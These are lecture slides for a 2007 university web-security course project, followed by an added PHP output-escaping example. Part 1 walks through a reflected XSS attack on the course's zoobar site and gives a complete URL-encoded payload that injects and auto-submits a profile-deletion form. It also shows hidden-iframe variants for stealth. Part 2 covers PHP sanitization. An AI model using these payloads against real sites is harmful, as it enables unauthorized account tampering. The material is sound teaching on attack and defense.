Project 2: Web App Security
Collin Jackson
CS 155, Spring 2007

Contents
Part 1: Attacks: Overview; Attacks; Sanitization; Example: Profile Deleter (Find vulnerability, Copy form data, URL encode, Debugging, Fixed version, Final test); Stealthier approaches
Part 2: Defenses: Goals; File structure; txt-db-api; Defenses to Part 1; PHP Sanitization Techniques; More XSS hunting; Good luck!

Slide 2: Part 1: Attacks

Slide 3: Overview
• Explore several attack types
• Requires both effectiveness and stealth
• Learn:
  • How an attacker can evade sanitization
  • Consequences of an exploit
  • JavaScript
  • Very basic CSS

Slide 4: Attacks
• A: Cookie Theft
  • Use URL encoding
  • Could hijack session
• B: Request Forgery
  • Navigate browser
  • Use iframes, forms
• C: Password Theft
  • Evade sanitization
  • Handle DOM events
• D: Profile Worm
  • Persistent attack
  • Replicates
[Diagram: for each attack, the flow between zoobar.org, badguy.com and stanford.edu via link, email, form and redirect]

Slide 5: Sanitization
Works differently depending on context:
• <tag property=" attackstring ">
  • Attack: break out with ' "
  • Defense: escape quotes with \
• <body> attackstring </body>
  • Attack: launch script with < >
  • Attack: close off parent tag </tag>
  • Defense: escape angle brackets
• eval( attackstring )
  • Attack: do whatever you want
  • Defense: don't do that

Slide 6: Example: Profile Deleter
• Malicious hyperlink deletes the profile of the user who clicks it
• Only works when the user is logged in
  • User might have multiple tabs open
  • Might have chosen/forgotten not to log out
  • Might appear in another user's profile
• Uses the vulnerability in users.php from Attack A
• Constructs a profile deletion form and submits it

Slide 7: Find vulnerability
• Site reflects the query parameter in an input field
• Link can include anything we want here
[Screenshot of users.php with the reflected field highlighted]

Slide 8: Copy form data
• View source to find the form fields
• Create a copycat form with our modifications
[Screenshot of the page source]

Slide 9: URL encode
• Close the previous <input> and <form>
• Button click triggers the form submit
• Encoders:
  • http://scriptasylum.com/tutorials/encdec/encode-decode.html
  • http://www.dommermuth-1.com/protosite/experiments/encode/index.html

Slide 10: Debugging
• It didn't work.
• Check the error: open the JavaScript console
• "Undefined: No properties!"
• Two forms with the same name

Slide 11: Fixed version
• Now with the correct form
• Profile deleted

Slide 12: Final Test
• users.php replaced with index.php
• http://zoobar.org/users.php?user=%22%3E%3C%2Fform%3E%3Cform%20method%3D%22POST%22%20name%3Dprofileform%0D%20%20action%3D%22%2Findex%2Ephp%22%3E%0D%3Ctextarea%20name%3D%22profile%5Fupdate%22%3E%3C%2Ftextarea%3E%3Cbr%2F%3E%0D%3Cinput%20type%3Dsubmit%20name%3D%22profile%5Fsubmit%22%20value%3D%22Save%20Profile%22%3E%3C%2Fform%3E%0D%3Cscript%3Edocument%2Eforms%5B1%5D%2Eprofile%5Fsubmit%2Eclick%28%29%3C%2Fscript%3E

Slide 13: Stealthier approaches
• Post the form into a hidden iframe:
    <form name=F action=/index.php target=myframe>…
    <iframe name=myframe style="visibility:hidden">…
• Open the page with the form in a hidden iframe:
    <iframe name=myframe style="visibility:hidden">…
    <script>document.myframe.contentDocument.forms[0].profile_update.value = "";</script>

Slide 14: Part 2: Defenses

Slide 15: Goals
• Learn:
  • How easy it is to make mistakes
  • That even simple code can be hard to secure
  • Techniques for appropriate input validation
  • PHP
  • Very basic SQL
• A little programming knowledge can be a dangerous thing

Slide 16: File structure
• index.php, users.php, transfer.php, login.php
• includes/
  • auth.php (cookie authentication)
  • common.php (includes everything else)
  • navigation.php (site template)
• db/zoobar/Person.txt (must be writable by the web server)
• Includes /usr/class/cs155/projects/pp2/txt-db-api/…
• Only edit these files

Slide 17: txt-db-api
• Third-party text file database library
• Data can be int, string, and autoincrement
• Need to escape strings: \' \" \\
• Actually magic_quotes_gpc does this for us:
    $recipient = $_POST['recipient']; // already escaped
    $sql = "SELECT PersonID FROM Person WHERE Username='$recipient'";
    $rs = $db->executeQuery($sql);
    if( $rs->next() )
        $id = $rs->getCurrentValueByName('PersonID');

Slide 18: Defenses to Part 1
• Attack A: Cookie Theft
• Attack B: Request Forgery
• Attack C: Password Theft
• Attack D: Profile Worm
[Table: one row per attack, defense column to be filled in]

Slide 19: PHP Sanitization Techniques
• addslashes(string)
  • Prepends a backslash to ' " \
  • Already done by magic_quotes_gpc
  • Inverse: stripslashes(string)
• htmlspecialchars(string [, quote_style])
  • Converts & < > " to HTML entities
  • Use ENT_QUOTES to also convert ' (to &#039;)
• strip_tags(string [, allowable_tags])
  • Max tag length 1024
  • Does not sanitize tag properties
• preg_replace(pattern, replacement, subject)
• More info: http://php.net

Slide 20: More XSS hunting
• Look for untrusted input used as output
• Note the sanitization already applied to each variable
  • Form data has magic_quotes_gpc, db data does not
• Sanitize the output if necessary
  • No penalty for erring on the side of caution
  • But sanitizing multiple times may lead to problems
• No credit for solving non-goals: SQL injection, etc.

Slide 21: Good luck!
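Added example, not code from the slides or the zoobar project: context-aware output escaping in PHP for the reflected user parameter of slides 7, 19 and 20. It assumes the value is echoed inside an <input value="..."> attribute, as in users.php, and the helper names are mine.

```php
<?php
// Added example (not the project's users.php). Assumes the reflected
// "user" query parameter is echoed inside an <input value="..."> attribute.
// Helper names (undo_magic_quotes, html_escape, render_user_field) are mine.

// Form data may already carry backslashes from magic_quotes_gpc (PHP 5 era).
// Remove them first so the value is escaped exactly once, for the output
// context it lands in, instead of being escaped twice.
function undo_magic_quotes(string $value): string {
    $magic = function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc();
    return $magic ? stripslashes($value) : $value;
}

// Attribute or body context: turn & < > " and, with ENT_QUOTES, ' into
// entities, so the value can neither close the quoted attribute nor open
// a new tag (the two attacks on slide 5).
function html_escape(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

// The reflected field from users.php, rendered with the value escaped.
function render_user_field(string $user): string {
    return '<input type="text" name="user" value="' . html_escape($user) . '">';
}

// strip_tags is the wrong tool for attribute context: it removes the <b>
// tags but leaves the "> that closes the value attribute and the input tag,
// which is the slide 19 caveat that it does not sanitize tag properties.
$probe = '"><b>probe</b>';                           // constructed sample input
echo 'strip_tags only: ', strip_tags($probe), "\n";
echo 'escaped:         ', render_user_field(undo_magic_quotes($probe)), "\n";

// Sanitizing twice (slide 20) mangles legitimate data: the & in an already
// escaped value is escaped again. Passing double_encode=false tells
// htmlspecialchars to leave existing entities alone.
$once = html_escape('Tom & Jerry');
echo 'twice:           ', htmlspecialchars($once, ENT_QUOTES, 'UTF-8'), "\n";
echo 'once, idempotent:', htmlspecialchars($once, ENT_QUOTES, 'UTF-8', false), "\n";
```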